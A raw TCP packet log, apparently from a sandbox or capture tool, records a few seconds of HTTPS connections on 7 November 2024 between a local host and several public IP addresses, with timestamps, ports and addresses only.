                                                                Nov 7, 2024 21:40:03.602380037 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:03.608428001 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:03.608469963 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:03.608551025 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:03.609724045 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:03.609745979 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:03.610063076 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:03.610157967 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:03.610203028 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:03.653072119 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:03.653085947 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:03.655323982 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:03.701083899 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:03.970598936 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:03.970634937 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:03.970733881 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:03.972698927 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:03.972712040 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:04.357069016 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357129097 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357202053 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.357237101 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357284069 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357549906 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357554913 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.357563972 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.357600927 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.357605934 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.358083010 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.358156919 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.358166933 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.362819910 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.363086939 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.363102913 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.405073881 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.454392910 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.454747915 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.454775095 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.455724001 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.455811024 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.456931114 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.456983089 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.457242012 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.457248926 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.471159935 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.471400976 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.471450090 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.471467972 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.471942902 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.471997976 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.472078085 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.472084045 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.472129107 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.472215891 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.472421885 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.472469091 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.472481012 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.500046015 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.516082048 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.516103983 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.564076900 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.586692095 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.586843014 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.586915016 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.586937904 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.587829113 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.587860107 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.587888956 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.587894917 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.587932110 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.587937117 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.588017941 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.588077068 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.588080883 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.588572979 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.588637114 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.588641882 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.644089937 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.702331066 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.702486038 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.702522039 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.702572107 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.702599049 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.702653885 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.702825069 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.703097105 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.703154087 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.703161001 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.703707933 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.703759909 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.703766108 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.747083902 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.747169971 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.747200012 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.747261047 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.808610916 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:04.808700085 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:04.812086105 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:04.812103033 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:04.812411070 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:04.818732023 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.818742990 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.818783045 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.818820953 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.818841934 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.818866968 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.819271088 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.819341898 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.819350004 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.819400072 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.823523998 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823548079 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823556900 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823585987 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823607922 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823635101 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.823661089 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.823681116 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.823717117 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.860944033 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.860955954 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.861052036 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.864577055 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:04.911330938 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:04.933587074 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.933702946 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.933881044 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.933953047 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.934359074 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.934412956 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:04.941163063 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.941185951 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.941243887 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.941267014 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:04.941292048 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.941312075 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:04.976505041 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:04.976603031 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.048739910 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.048862934 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.048893929 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.048949003 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.049696922 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.049781084 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.050143957 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.050200939 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.058876991 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:05.058897972 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:05.058965921 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:05.059001923 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:05.059041977 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:05.059093952 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:05.059379101 CET49720443192.168.2.1618.245.31.5
                                                                Nov 7, 2024 21:40:05.059396982 CET4434972018.245.31.5192.168.2.16
                                                                Nov 7, 2024 21:40:05.070502996 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.070538998 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.070616961 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.070842981 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.070851088 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.091994047 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.092148066 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.104765892 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.104844093 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.105048895 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.105081081 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.105093002 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.105093002 CET49721443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.105101109 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.105108023 CET44349721184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.143376112 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.143399000 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.143502951 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.143825054 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:05.143836975 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:05.164191961 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.164330006 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.164901972 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.164949894 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.164971113 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.164979935 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.165045977 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.165050983 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.165088892 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.165132999 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.165278912 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.165291071 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.181962967 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.182013988 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.182132959 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.182332993 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.182347059 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.192871094 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:05.192893982 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:05.193073988 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:05.193275928 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:05.193289995 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:05.217495918 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.217511892 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.217582941 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.217844009 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:05.217860937 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:05.218163013 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:05.218415976 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.218426943 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.218575001 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:05.218597889 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:05.230597973 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.230629921 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.230691910 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.230813026 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.230840921 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.230978012 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231029987 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231039047 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.231211901 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231326103 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231337070 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.231481075 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231492996 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.231642008 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.231657028 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.244046926 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.244066000 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.245240927 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.246047020 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.246057987 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.335124016 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.335141897 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.335230112 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.335525036 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.335535049 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.786606073 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.790895939 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.790920973 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.792018890 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.792119980 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.792507887 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.792562008 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.792665958 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.835345030 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.839158058 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.839183092 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.883922100 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.888905048 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.891885042 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.891907930 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.892877102 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.892951012 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.892986059 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:05.893328905 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.893346071 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.893373013 CET44349732188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.893402100 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.893457890 CET49732443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.893740892 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.893776894 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.895477057 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.897161961 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.897170067 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.910187960 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.911335945 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.911350965 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.912230015 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.912288904 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.912678003 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.912731886 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.912858009 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.912864923 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:05.928534985 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.928638935 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.928674936 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929095030 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929124117 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929130077 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.929130077 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.929145098 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929522038 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929549932 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.929589987 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.929589987 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.929596901 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.931658983 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.932180882 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.932202101 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.933058977 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.933116913 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.933271885 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.933743000 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:05.933748007 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:05.937189102 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.937207937 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.937237024 CET44349734188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.937269926 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.937313080 CET49734443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.940608025 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.940634966 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.940696001 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.945593119 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:05.945606947 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:05.954575062 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.955724001 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.955734968 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.956928015 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.956980944 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.959999084 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.962073088 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.962073088 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.962081909 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.962977886 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.963030100 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.964340925 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.964366913 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.965224028 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.965292931 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.966028929 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:05.966847897 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.966900110 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.968997002 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:05.969002962 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:05.973495960 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.975370884 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.975379944 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.976536036 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.976583958 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.977617025 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.977701902 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.977756977 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.977768898 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.979625940 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.979706049 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.979974031 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.979976892 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.979985952 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.980000019 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.980027914 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:05.980032921 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:05.981941938 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.011048079 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.016344070 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.016441107 CET49723443192.168.2.16184.28.90.27
